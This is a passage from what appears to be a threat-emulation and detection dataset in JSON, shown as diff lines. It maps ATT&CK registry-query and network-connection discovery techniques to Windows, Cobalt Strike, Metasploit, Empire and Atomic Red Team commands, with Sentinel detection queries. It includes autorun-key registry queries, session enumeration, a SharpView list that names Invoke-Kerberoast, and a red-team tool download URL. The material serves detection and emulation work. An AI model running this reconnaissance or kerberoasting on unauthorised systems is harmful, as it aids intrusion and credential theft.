NT\\CurrentVersion\\Winlogon\\Notify", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", + "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "powershell/situational_awareness/network/powerview/get_cached_rdpconnection" + ], + "commands": [ + { + "command": "reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections ", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "reg queryval -k \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" -v fDenyTSConnections\npost/windows/gather/enum_termserv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nreg query \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKLM\\system\\currentcontrolset\\services /s | findstr ImagePath 2>nul | findstr /Ri \".*\\.sys$\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n", + "source": "atomics/T1012/T1012.yaml", + "name": "Atomic Red Team Test - Query Registry" + }, + { + "command": "Get-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\n", + "source": "data/abilities/discovery/2488245e-bcbd-405d-920e-2de27db882b3.yml", + "name": "Query Registry using PowerShell Get-ItemProperty" + }, + { + "command": "cmd.exe reg (query|add)", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_cached_rdpconnection", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1012", + "Built-in Windows Command": "reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections ", + "Cobalt Strike": "shell reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections", + "Metasploit": "reg queryval -k \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" -v fDenyTSConnections\npost/windows/gather/enum_termserv", + "Description": "Check for the current registry value for terminal services, if it's 0, then terminal services are enabled. If it's 1, then they're disabled" + }, + { + "attack_technique": "T1012", + "display_name": "Query Registry", + "atomic_tests": [ + { + "name": "Query Registry", + "auto_generated_guid": "8f7578c4-9863-4d83-875c-a565573bbdf0", + "description": "Query Windows Registry.\nUpon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).\nReferences:\nhttps://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order\nhttps://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services\nhttp://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf\nhttps://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nreg query \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKLM\\system\\currentcontrolset\\services /s | findstr ImagePath 2>nul | findstr /Ri \".*\\.sys$\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "2488245e-bcbd-405d-920e-2de27db882b3", + "name": "Query Registry", + "description": "Query Registry using PowerShell Get-ItemProperty", + "tactic": "discovery", + "technique": { + "attack_id": "T1012", + "name": "Query Registry" + }, + "platforms": { + "windows": { + "psh": { + "command": "Get-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\n" + } + } + } + }, + { + "chain_id": "100148", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100149", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100150", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100151", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100152", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100153", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100154", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100155", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100156", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100157", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100158", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100159", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100160", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100161", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100162", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100163", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100164", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_cached_rdpconnection", + "ATT&CK Technique #1": "T1012", + "ATT&CK Technique #2": "", + "Technique": "Query Registry", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_cached_rdpconnection\": [\"T1012\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and process_path contains \"reg.exe\" and process_command_line contains \"reg query\"", + "name": "Query Registry Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"reg.exe\" and process_command_line contains \"reg query\"", + "name": "Query Registry Process" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "LOG-MD Reg Compare", + "Windows Registry" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1049", + "command_list": [ + "netstat -ano[b] ", + "shell c:\\windows\\sysnative\\netstat.exe -ano[b]", + "post/windows/gather/tcpnetstat", + "net session | find / \"\\\\\"", + "shell net session | find / \"\\\\\"", + "post/windows/gather/enum_logged_on_users", + "netstat\nnet use\nnet sessions\n", + "Get-NetTCPConnection\n", + "netstat\nwho -a\n", + "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n", + "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\nPathToAtomicsFolder\\T1049\\bin\\SharpView.exe $syntax -}\n", + "$syntaxList = \"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" \n\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n", + "netstat -anto\n", + "netstat -anto;\nGet-NetTCPConnection\n", + "powershell/situational_awareness/host/monitortcpconnections", + "powershell/situational_awareness/network/powerview/get_rdp_session" + ], + "commands": [ + { + "command": "netstat -ano[b] ", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell c:\\windows\\sysnative\\netstat.exe -ano[b]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/tcpnetstat", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net session | find / \"\\\\\"", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net session | find / \"\\\\\"", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/enum_logged_on_users", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "netstat\nnet use\nnet sessions\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "Get-NetTCPConnection\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "netstat\nwho -a\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\nPathToAtomicsFolder\\T1049\\bin\\SharpView.exe $syntax -}\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "$syntaxList = \"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" \n\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "netstat -anto\n", + "source": "data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml", + "name": "Find System Network Connections" + }, + { + "command": "netstat -anto;\nGet-NetTCPConnection\n", + "source": "data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml", + "name": "Find System Network Connections" + }, + { + "command": "powershell/situational_awareness/host/monitortcpconnections", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_rdp_session", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1049", + "Built-in Windows Command": "netstat -ano[b] ", + "Cobalt Strike": "shell c:\\windows\\sysnative\\netstat.exe -ano[b]", + "Metasploit": "post/windows/gather/tcpnetstat", + "Description": "Display current TCP/IP network connections (b requires elevated privs so you can see the process that opened the connection)" + }, + { + "Category": "T1049", + "Built-in Windows Command": "net session | find / \"\\\\\"", + "Cobalt Strike": "shell net session | find / \"\\\\\"", + "Metasploit": "post/windows/gather/enum_logged_on_users", + "Description": "Display the list of active SMB sessions on the workstation so you can see which users have active connections." + }, + { + "attack_technique": "T1049", + "display_name": "System Network Connections Discovery", + "atomic_tests": [ + { + "name": "System Network Connections Discovery", + "auto_generated_guid": "0940a971-809a-48f1-9c4d-b1d785e96ee5", + "description": "Get a listing of network connections.\n\nUpon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netstat\nnet use\nnet sessions\n", + "name": "command_prompt" + } + }, + { + "name": "System Network Connections Discovery with PowerShell", + "auto_generated_guid": "f069f0f1-baad-4831-aa2b-eddac4baac4a", + "description": "Get a listing of network connections.\n\nUpon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-NetTCPConnection\n", + "name": "powershell" + } + }, + { + "name": "System Network Connections Discovery Linux & MacOS", + "auto_generated_guid": "9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2", + "description": "Get a listing of network connections.\n\nUpon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if netstat command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v netstat)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"Install netstat on the machine.\"; exit 1;\n" + } + ], + "executor": { + "command": "netstat\nwho -a\n", + "name": "sh" + } + }, + { + "name": "System Discovery using SharpView", + "auto_generated_guid": "96f974bb-a0da-4d87-a744-ff33e73367e9", + "description": "Get a listing of network connections, domains, domain users, and etc. \nsharpview.exe located in the bin folder, an opensource red-team tool.\nUpon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "SharpView_url": { + "description": "sharpview download URL", + "type": "Url", + "default": "https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true" + }, + "SharpView": { + "description": "Path of the executable opensource redteam tool used for the performing this atomic.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1049\\bin\\SharpView.exe" + }, + "syntax": { + "description": "Arguements method used along with 